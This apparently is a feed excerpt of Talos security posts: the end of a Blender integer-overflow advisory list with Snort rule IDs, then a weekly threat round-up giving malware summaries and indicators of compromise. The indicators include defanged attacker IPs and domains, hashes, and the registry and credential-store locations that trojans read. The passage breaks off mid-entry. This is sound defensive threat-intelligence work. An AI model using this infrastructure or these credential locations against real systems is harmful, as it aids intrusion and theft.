                  • TALOS-2017-0452 - Blender multires_load_old_dm base vertex map Integer Overflow Code Execution Vulnerability
                    An integer overflow vulnerability in the way Blender handles opening older file versions contains the `Multires` structure.
                  • TALOS-2017-0453 - Blender modifier_mdef_compact_influences Integer Overflow Code Execution Vulnerability
                    An integer overflow vulnerability in the way Blender handles opening older file versions contains the `bindcos` structure.
                  • TALOS-2017-0454 - Blender BKE_curve_bevelList_make Integer Overflow Code Execution Vulnerability
                    An integer overflow vulnerability in the way Blender converts curves to polygons.
                  • TALOS-2017-0455 - Blender BKE_vfont_to_curve_ex Integer Overflow Code Execution Vulnerability
                    An integer overflow vulnerability in the way Blender converts text rendered as a font into a curve.
                  • TALOS-2017-0456 - Blender draw_new_particle_system PART_DRAW_AXIS Integer Overflow Code Execution Vulnerability
                    An integer overflow vulnerability in the way Blender draws a Particle object.
                  • TALOS-2017-0457 - Blender mesh_calc_modifiers eModifierTypeType_OnlyDeform Integer Overflow Code Execution Vulnerability
                    An integer overflow vulnerability in the way Blender applies a particular object modifier to a Mesh.
                  For more information on these vulnerabilities or to view other security advisories, please visit the Vulnerability Information portal on our website.

                  Conclusion


                  Vulnerabilities in software are not the exception but the norm, especially as applications increase in size and complexity. Identifying software vulnerabilities in a programmatic fashion is a major challenge, but plays a vital role in securing and protecting our customers as it identifies potential attack vectors that adversaries may already be trying to exploit. Talos will continue to identify software vulnerabilities in order to help protect our customers and, more importantly, the broader internet community.

                  Coverage


                  Talos is releasing the following Snort rules that detect attempts to exploit these vulnerabilities in Blender. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                  Snort Rules

                  • 16716
                  • 43399
                  • 44167-44168
                  • 44186-44187
                  • 44223-44230
                  • 44237-44266
                  • 44269-44270
                  • 44287-44288
                  • 44318-44319
                  • 44376-44377
                  • 44397-44398
                  • 44441-44442
                  • 44444-44449

                  Threat Round Up for January 5 - 12

                  $
                  0
                  0
                  Today, Talos is publishing a glimpse into the most prevalent threats we've observed between January 05 and January 12. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

                  As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

                  The most prevalent threats highlighted in this round up are:

                  • Win.Adware.Coupons-6417934-0
                    Adware
                    The Coupons malware family, frequently seen as adware too, is known to injects vertical and horizontal advertisement banners into websites. The malware has the capability to install additional malicious binaries.
                     
                  • Win.Downloader.Downloadguide-6418258-0
                    Downloader
                    Downloadguide is commonly bundled with other software. It may install unwanted browser extensions that can negatively affect the users browsing experience or by injecting ads, or share private browsing information.
                     
                  • Win.Trojan.Agent-6418378-0
                    Credential Harvesting Trojan
                    This obfuscated .NET trojan self deletes and migrates around in memory. It collects system data including Outlook and Firefox stored information and a machine screenshot.
                     
                  • Win.Trojan.Bancteian
                    Trojan
                    This cluster contains samples belonging to the infamous Bancteian family. This trojan has many features and it is persistent. It modifies systems files and disables UAC as well as hidden files listing. Moreover it performs code injection and it should be able to download and execute files downloaded from remote servers.
                     
                  • Win.Trojan.Emotet-6418193-0
                    Trojan
                    This dropper is delivered through different mechanism, most of the time the victims is redirected to a website to get it through malicious pdf, http iframe injected. Once running on the computer the binary is gathering details on volume disk drive and other details, injecting process, dropping itself and contacting internet to execute more. Websites observed delivering ransomware and trojan banker.
                     
                  • Win.Trojan.Generic-6417450-0
                    Trojan
                    This cluster focuses on .Net Trojans that make use of process injection techniques to mask malicious actions.
                     
                  • Win.Trojan.Generic-6417989-3
                    Trojan
                    Win.Trojan.Generic-6417989-3 is a trojan that will contact a CnC server and try to steal information from the infected host.
                     
                  • Win.Trojan.Rincux-6417593-0
                    Trojan
                    Rincux is a Windows trojan distributed to act as a downloader or contribute to DDoS attacks. This variant relies on the Armadillo packer for added protection against analysis attempts. It will also fork off into several child processes based on binary drops to the Windows root directory.
                     
                  • Win.Trojan.SocStealer-6418271-1
                    Trojan
                    This malware is a trojan spy. It will extract information from the victim's PC and send them to the malicious actor behind the threat.
                     
                  • Win.Trojan.Zusy-6417556-0
                    Banking Trojan
                    This trojan uses Man-in-the-Middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe". When the user access a banking website, it displays a form to trick the user into revealing personal information.
                     

                  Threats

                  Win.Adware.Coupons-6417934-0


                  Indicators of Compromise


                  Registry Keys
                  • N/A
                  Mutexes
                  • N/A
                  IP Addresses
                  • N/A
                  Domain Names
                  • N/A
                  Files and or directories created
                  • N/A
                  File Hashes
                  • c3b5af2487af32916f57f8d42431bc06b88df20e72b38221b5f5f6464b82f01d
                  • db8d472d6437ef578ea0af7222af606288b247e847ff6ea08f830f9a3c919698
                  • 1b776ccc9d8ce5f83cf8d99e40c3b60f208bb3eb09a723fb844d4377b8af0e4a
                  • a6da7c7869f82a146a27bf06b2076d9e3929a6c20e413c7a9734641058b89e40
                  • edfc4ae651f3b9c858902791db52608036bdfcd2c23dbb4417c33b0852265f1a
                  • 83e58852442ed18b48c40e5c2f49fca174ae4007df7b6738ecd66663c9ccd88c
                  • 7100cb4b1cb6fa8e6a1897a9e3675ad0bae2ee82b63264ade40ce00bd7056606
                  • 2e9fa9b027d355a1fc50ca77bd7b7850a3a1d56122de5894bda5dc1579708fad
                  • eaa3e4886140186455fd515ecbe44e98c37f19e5353a3f2362cdc94b4e3178c4
                  • d7cc319288f079faa2f078d68ad3058890893e0952aae677652dbadc8ef7ada3
                  • d60409eb6b57d6f3b863da3a5ea8e0cb3dcec11f51324f6f110259dcbabb2b54
                  • 7086cae185896225b4924cc5e46e8e6edf2abfc78de1f4f695541b124d7bd795
                  • 19e971270674fd66f23747bec75bceac78431ea120a0338aa71182d36c3c4fa0
                  • c6444613969c7ad0b4fea1bfec260200ab8378a496bd77f2f04ea87dfec110ab
                  • 6c370706286c012d9e9f7f17ef6bd27f17a5d6f54232e94efcf507e45148abf3
                  • 0311c1383a2112b46ad9821c49a6aa5424776a37f207db4fd88f689ae061715a
                  • 97d422a62763ac81fa5007768c98b45adbf8107bcfe46cfde873fdf7395f3947
                  • 0347385888c90f292574903ebb72cd3d1e6b900796100cd130ff46d27de5cf09
                  • 328c1c54df14ccd6ca36d14ad981b9139807020979bd371eaf916c28027776c4
                  • 62ec31504f1dcb2a64891dcd2f5926bf6ad147b4c36358951f0b67fd0b77e689
                  • 85e3d4996b42c5d0c558195e5699ec62e24a94d4f4b5431cd440c9a4c2e4180b
                  • 48c15084f2a9f83831b9dc2811156e81ad18890b0d059c2ca7c3cc40eb243deb
                  • 61e8eff89c7b7c26454deb86170d3c6a38be3dd077f59d0f827fbddc6d60404a
                  • 8966c6c67b61def5d4e72129507f5ba9a16a27593357ddcec5e51b1cafe92207
                  • 40d2277549bb5b079c154dae83dd462d89f1036947a211112fba988e0f51e046

                  Coverage


                  Screenshots of Detection

                  AMP


                  ThreatGrid







                  Win.Downloader.Downloadguide-6418258-0


                  Indicators of Compromise


                  Registry Keys
                  • <HKCU>\Software\Microsoft\Internet Explorer\Main\WindowsSearch
                  Mutexes
                  • DlgCpp
                  IP Addresses
                  • 23[.]102[.]60[.]206
                  • 104[.]40[.]156[.]71
                  Domain Names
                  • dlg-messages[.]buzzrin[.]de
                  • dlg-configs[.]buzzrin[.]de
                  Files and or directories created
                  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\DLG\ui\offers\fd286b8d7f971e3468eba12c41b59383\uifile.zip.part
                  • \TEMP\download-downloadspeedtest.exe
                  • %TEMP%\DLG4547.tmp
                  File Hashes
                  • f0d58b5f95df0334943a6ddfe69002d76d014402050001bd0e49dcda87e235a4
                  • 23b495217cfeffa3c5ec8a842e109c281e3e56ceda74c3aefa772ed35028269c
                  • cd2cf4cf6f86568ae34da56e46245a2569b06cc8098055292576e1516d682239
                  • e1a193f844881ac3215a237323e3cfef179e907cd175bf5f644e4991b849bee4
                  • cc9581cbcd550ffc661f505b39fa0dee831014101fec1bdd0773647754337e60
                  • 4f5ccef0a56e46ed4c4cee2d255e3805c45924bba2e915fc076fe9009b84ea59
                  • 948e8e7cdcdc56ac33c9d3609f43b601aa01b56651f6bbc120fb2aabc50fae0a
                  • 220f1b3998fdf561501bfd979dd123f4c5881bd30ae040d215fd108c2f191b99
                  • 5a50f0badf17522ee97f07add6533362b0c203b894d3d8aee9415c6889cbdf8a
                  • 31297810592b4b0363d5b5789bad3b5da3dfd3c633ad8b9e5d1e8c7f9acb7ef2
                  • ea95d29ba35dd2d85d1a51e6bd3512e426962f2ce44d8f1e666d5a48f341ae59
                  • 4dfcf69e32b2e896a50fa784e8a4868384254ab5f53da7e7c1ab1d5db0081f01
                  • c8729c7f479bcadeb3677aba3308154a45c731c74278943e1d22a439f8fa8aff
                  • 1049e9f4052a0b7c9ddc141f0b6ae6a65588d948e9303458d377c0169bcb2654
                  • db4b0afd6e8fffe1de96f59f6e54c98b47b207f9e3606347bfea74ac1125fc0f
                  • bdf2bb0d4008cac0d2aceb8c3653342aaa5c7543209819f55708d0a2c66d8cc0
                  • 36d797122a02e757a4f18bfcdbd95fc2648fc6f1a99472722b8cab48d300c969
                  • f0b71d1a0e281dd5927fb2c5a82cf90938feffe7587dece0a3e7885c8a2a681a
                  • 4128737ed9fd6ec454b6284b3fdb9d9152606b7e1f12d83138fba669425574b9
                  • b1971317dd3567c839e6aa0a0082b18af101c9cbd7aa52177a55e2c00154a542

                  Coverage


                  Screenshots of Detection

                  AMP







                  Win.Trojan.Agent-6418378-0


                  Indicators of Compromise


                  Registry Keys
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5
                    • Value: _ObjectLru_
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5
                    • Value: _FileId_
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5
                    • Value: _ObjectId_
                  • <HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION
                    • Value: PnpInstanceID
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
                    • Value: CachePrefix
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
                    • Value: CachePrefix
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
                    • Value: CachePrefix
                  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
                    • Value: L4XTIT8X0X1
                  • <HKU>\S-1-5-21-2580483871-590521980-3826313501-500_CLASSES\LOCAL SETTINGS\MUICACHE\3A\52C64B7E
                    • Value: LanguageList
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST
                    • Value: CurrentLru
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5
                    • Value: _UsnJournalId_
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
                    • Value: 10000000090A2
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}\10000000090A2
                    • Value: AB5
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5
                    • Value: _Usn_
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5
                    • Value: AeFileID
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\00000000000029D3
                    • Value: ObjectId
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\00000000000029D3
                    • Value: ObjectLru
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE
                    • Value: _CurrentObjectId_
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5
                    • Value: AeProgramID
                  • <HKCU>\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\
                  • <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4c8f4917d8ab2943a2b2d4227b0585bf
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ecd15244c3e90a4fbd0588a41ab27c55
                  • <HKCU>\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9e71065376ee7f459f30ea2534981b83
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                  • <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\33fd244257221b4aa4a1d9e6cacf8474
                  • <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\20.0.1 (en-US)\Main
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a88f7dcf2e30234e8288283d75a65efb
                  • <HKU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}\10000000090A2
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5\Indexes
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  • <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer
                  • <HKCU>\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\82fa2a40d311b5469a626349c16ce09b
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e
                  • <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5309edc19dc6c14cbad5ba06bdbdabd9
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  • <HKCU>\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook_2016\
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\df18513432d1694f96e6423201804111
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\d33fc3b19a738142b2fc0c56bd56ad8c
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
                  Mutexes
                  • 8-3503835SZBFHHZ
                  • <3 character prefix>RTU088V35CE4z
                  IP Addresses
                  • 208[.]91[.]197[.]39
                  • 198[.]251[.]84[.]92
                  • 198[.]251[.]81[.]30
                  • 173[.]44[.]37[.]208
                  • 45[.]58[.]190[.]82
                  • 103[.]47[.]81[.]80
                  • 104[.]149[.]163[.]27
                  • 46[.]23[.]69[.]44
                  • 64[.]32[.]22[.]101
                  • 70[.]39[.]125[.]243
                  • 188[.]164[.]131[.]200
                  • 104[.]27[.]176[.]2
                  • 209[.]141[.]38[.]71
                  • 104[.]27[.]177[.]2
                  • 192[.]161[.]187[.]200
                  • 68[.]65[.]121[.]51
                  • 104[.]221[.]251[.]226
                  • 198[.]52[.]124[.]90
                  • 192[.]0[.]78[.]24
                  • 192[.]0[.]78[.]25
                  • 107[.]161[.]23[.]204
                  • 66[.]96[.]147[.]117
                  • 204[.]188[.]203[.]154
                  • 95[.]183[.]53[.]20
                  Domain Names
                  • www[.]atopgixn[.]info
                  • www[.]szsyxsy[.]com
                  • www[.]9u82eum[.]info
                  • www[.]doors[.]property
                  • www[.]pilates-sunbury[.]com
                  • www[.]jmtravelconsultants[.]com
                  • www[.]dangkytaikhoan[.]net
                  • www[.]whoever[.]group
                  • WWW[.]YHCF88[.]COM
                  • www[.]dontdodebt[.]com
                  • www[.]jieleshxijie[.]com
                  • p2017090801-dns01[.]junyudns[.]com
                  • www[.]flevocoachingenbemiddeling[.]com
                  • www[.]armortechnologylimited[.]com
                  • www[.]yhcf88[.]com
                  • www[.]020jiezhuang[.]com
                  Files and or directories created
                  • %AppData%\<3 character prefix><5 characters>\<3 character prefix>logim.jpeg
                  • %AppData%\<3 character prefix><5 characters>\<3 character prefix>logrv.ini
                  • %AppData%\<3 character prefix><5 characters>\<3 character prefix>log.ini
                  • %AppData%\<3 character prefix><5 characters>\<3 character prefix>logri.ini
                  • %AppData%\<3 character prefix><5 characters>\<3 character prefix>logrc.ini
                  File Hashes
                  • e9c1fa94dd30f4ef9ca613f62acb3fcf2fb61c4c3fac0b866ae484cd5dc578d7
                  • 55ebfbbffe1cb77efa39b0c7b5348b0aef03a251349c88cb8bcf4358bbe73558
                  • 5b6e111a37e7c0fdaefd543ea45ff37f162bfeda2b58ce60783091ad6129f11a
                  • 3ad3991209de094faf8bbfac835ec38ac57318fa78c3ef11eee5d4acd0118460
                  • ea9eb1d7b61d711807c4609bf55f62af5bd6049585e086b75385963868ca31d6
                  • 38318b262a6d85673fdf8fdcf4ddd5666f438f18dbeed8569a4d769f42ae05c2
                  • 59571268f235c8094036ab44f5f5c2be3819fd72888cbbfda2150e336549b2a8

                  Coverage


                  Screenshots of Detection

                  AMP


                  ThreatGrid


                  Umbrella







                  Win.Trojan.Bancteian


                  Indicators of Compromise


                  Registry Keys
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
                    • Value: CachePrefix
                  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
                    • Value: PromptOnSecureDesktop
                  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
                    • Value: Shell
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
                    • Value: CachePrefix
                  • <HKU>\S-1-5-21-2580483871-590521980-3826313501-500_CLASSES\LOCAL SETTINGS\MUICACHE\3A\52C64B7E
                    • Value: LanguageList
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
                    • Value: CachePrefix
                  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
                    • Value: Userinit
                  • <HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
                  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER
                    • Value: GlobalAssocChangedCounter
                  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                    • Value: Microsoft Windows
                  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
                    • Value: ConsentPromptBehaviorAdmin
                  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                    • Value: WinDefend
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
                    • Value: ShowSuperHidden
                  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
                    • Value: EnableLUA
                  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                    • Value: Host Process for Windows Services
                  • <HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                  • <HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
                  • <HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer
                  • <HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2
                  • <HKU>\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                  • <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
                  • <HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                  Mutexes
                  • Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwReaderRefs
                  IP Addresses
                  • N/A
                  Domain Names
                  • N/A
                  Files and or directories created
                  • %AppData%\RCX3.tmp
                  • %WinDir%\wininit.exe
                  • %WinDir%\wininit.exe (copy)
                  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\svchost.exe
                  • %AppData%\spoolsv.exe (copy)
                  • %TEMP%\icsys.ico
                  • \TEMP\03479bf7ca41f9cb7a1243103b8cc49b4963489b4fce9d80237d93ce1439fcc2.exe
                  • \Users\Administrator\AppData\Local\Microsoft\Windows\WebCache\V01.chk
                  • %WinDir%\RCX1.tmp
                  • %SystemDrive%\documents and settings\administrator\local settings\application data\svchost.exe (copy)
                  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\icsys.ico
                  • \Users\Administrator\AppData\Local\svchost.exe
                  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\RCX2.tmp
                  • \Users\Administrator\AppData\Local\Microsoft\Windows\WebCache\V0100010.log
                  • %AppData%\spoolsv.exe
                  File Hashes
                  • 03479bf7ca41f9cb7a1243103b8cc49b4963489b4fce9d80237d93ce1439fcc2
                  • 086928aa133cd03aa950e0172ea060f51794f74dceb0974fe335d68d8762cc31
                  • 1fc56d9b169a79fa34565f7dc1ffe85501da06abfead4beb4add8f0d77dfa61a
                  • 2893f28740ab0a01fdc40dcdee227649b8d930af288e5a43fd989195441b6029
                  • 29c488b4cdbf1023b9aebe15c5e3b56280e3424ee02d9f38d82ac47221688853
                  • 4b32a37e27c5d21cda8349829484736ad79c5f5559d81e709a9fabb064793eff
                  • 53907dc338e0d219b3b0a38ff28958b1a2c862a4ef0b8bf2ebaad9ba9c032399
                  • 6b11929c8b220ab7557d999c74aa27773bf6ecf975a5b4309fc39fff95b76ed9
                  • a585c8eb9366029b147b5e027b136420aa214183d3ff200e6899324faa02bbe8
                  • ac0cf677808ee093e27a20511b8346e127931310d65af1b61c65dfcfb5f543e6

                  Coverage


                  Screenshots of Detection

                  AMP


                  ThreatGrid







                  Win.Trojan.Emotet-6418193-0


                  Indicators of Compromise


                  Registry Keys
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
                    • Value: SavedLegacySettings
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
                    • Value: IntranetName
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
                    • Value: AutoDetect
                  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
                    • Value: IntranetName
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
                    • Value: CachePrefix
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
                    • Value: CachePrefix
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
                    • Value: CachePrefix
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                    • Value: ProxyServer
                  • <HKU>\S-1-5-21-2580483871-590521980-3826313501-500_CLASSES\LOCAL SETTINGS\MUICACHE\3A\52C64B7E
                    • Value: LanguageList
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
                    • Value: UNCAsIntranet
                  • <HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOWREGISTRY
                    • Value: AddToFavoritesInitialSelection
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
                    • Value: DefaultConnectionSettings
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
                    • Value: ProxyBypass
                  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
                    • Value: ProxyBypass
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                    • Value: AutoConfigURL
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                    • Value: ProxyEnable
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                    • Value: AutoDetect
                  • <HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOWREGISTRY
                    • Value: AddToFeedsInitialSelection
                  • <HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION
                    • Value: PnpInstanceID
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                    • Value: ProxyOverride
                  Mutexes
                  • Global\AmInst__Runing_1
                  • Local\ZonesCacheCounterMutex
                  • Local\MSCTF.Asm.MutexDefault1
                  • \BaseNamedObjects\Global\AmInst__Runing_1
                  • Local\ZonesLockedCacheCounterMutex
                  IP Addresses
                  • 198[.]54[.]117[.]212
                  Domain Names
